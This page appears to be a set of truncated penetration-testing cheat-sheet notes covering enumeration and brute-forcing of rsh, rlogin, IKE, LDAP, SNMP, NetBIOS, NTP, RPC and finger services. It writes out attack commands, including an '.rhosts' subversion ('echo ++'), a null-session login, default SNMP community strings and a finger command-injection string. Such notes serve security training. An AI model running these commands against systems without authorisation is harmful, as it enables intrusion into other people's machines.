Latest notes for PenTesting - MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Rsh Enumeration
> rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
Rsh Brute Force
> rsh-grind ( http://pentestmonkey.net/tools/rsh-grind/ )
> Hydra ( http://freeworld.thc.org/ )
> medusa ( http://www.foofus.net/jmk/medusa/ )...


Rlogin Enumeration
> Find the files
find / -name .rhosts
locate .rhosts
> Examine Files
cat .rhosts
> Manual Login
rlogin hostname -l username
rlogin <IP>
> Subvert the files
echo ++ > .rhosts

Rlogin Brute Force
> Hydra ( http://freeworld.thc.org/ )...


modscan
http://www.packetstormsecurity.org/UNIX/scanners/modscan.py.txt...


Enumeration
> ike-scan ( http://www.nta-monitor.com/ike-scan/ )
> ike-probe ( http://www.ernw.de/download/ikeprobe.zip )

Brute-Force
> ike-crack ( http://ikecrack.sourceforge.net/ )

Reference Material
> PSK cracking paper ( http://www.ernw.de/download/pskattack.pdf )
> SecurityFocus Infocus ( http://www.securityfocus....


LDAP enumeration
> ldapminer ( http://sourceforge.net/projects/ldapminer/ )
ldapminer -h ip_address -p port (not required if default) -d
> luma ( http://luma.sourceforge.net/ )
GUI-based tool
> ldp ( http://www.microsoft.com/ )
GUI-based tool
> openldap ( http://www.vulnerabilityassessment.co.uk/%20http://www.openldap.org/ )
...


Default Community Strings
> public
> private
> cisco
>> cable-docsis
>> ILMI

MIB enumeration
> Windows NT
>> .1.3.6.1.2.1.1.5 Hostnames
>> .1.3.6.1.4.1.77.1.4.2 Domain Name
>> .1.3.6.1.4.1.77.1.2.25 Usernames
>> .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
>> .1.3.6.1.4.1....


NetBIOS enumeration
> Enum
>> enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
> Null Session
>> net use \\192.168.1.1\ipc$ "" /u:""
>>> net view \\ip_address
>>> Dumpsec ( http://www.systemtools.com/download/dumpacl.zip )
...


NTP Enumeration
> ntpdc -c monlist IP_ADDRESS
> ntpdc -c sysinfo IP_ADDRESS
> ntpq
>> host
>> hostname
>> ntpversion
>> readlist
>> version

Examine configuration files
> ntp.conf...


rpcdump.py ( http://oss.coresecurity.com/impacket/rpcdump.py )
> rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

rpcinfo
> rpcinfo [options] IP_Addres...


User enumeration
> finger 'a b c d e f g h' @example.com
> finger admin@example.com
> finger user@example.com
> finger 0@example.com
> finger .@example.com
> finger **@example.com
> finger test@example.com
> finger @example.com

Command execution
> finger "|/bin/id@example.com"
...
